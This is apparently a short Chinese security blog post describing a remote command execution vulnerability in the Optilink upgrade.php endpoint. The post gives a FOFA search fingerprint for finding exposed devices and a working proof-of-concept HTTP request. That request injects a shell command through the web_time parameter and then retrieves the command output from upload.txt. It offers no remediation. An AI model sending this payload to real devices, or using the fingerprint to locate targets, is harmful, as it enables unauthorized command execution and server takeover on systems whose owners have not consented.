Optilink upgrade.php 命令执行漏洞

99次阅读
没有评论

共计 358 个字符,预计需要花费 1 分钟才能阅读完成。

漏洞概述

Optilink upgrade.php 接口存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。

搜索引擎

FOFA:


body="/html/css/dxtdata.css"

漏洞复现

POC:

GET /cgi/fsystem/upgrade.php?time=1&web_time=;ifconfig>upload.txt; HTTP/1.1 
Host  :
User-Agent:-Mozi1la/5.0-(Cent05;-Linux-i686)-ApplellebKit/537.36-(KHTML,-1ike-Gecko)-Chrome/118.0.0.0-Safari/537.36 
Accept-Encoding: gzip
GET /cgi/fsystem/upload.txt

正文完
 0
admin
版权声明:本站原创文章,由 admin 于2025-07-03发表,共计358字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)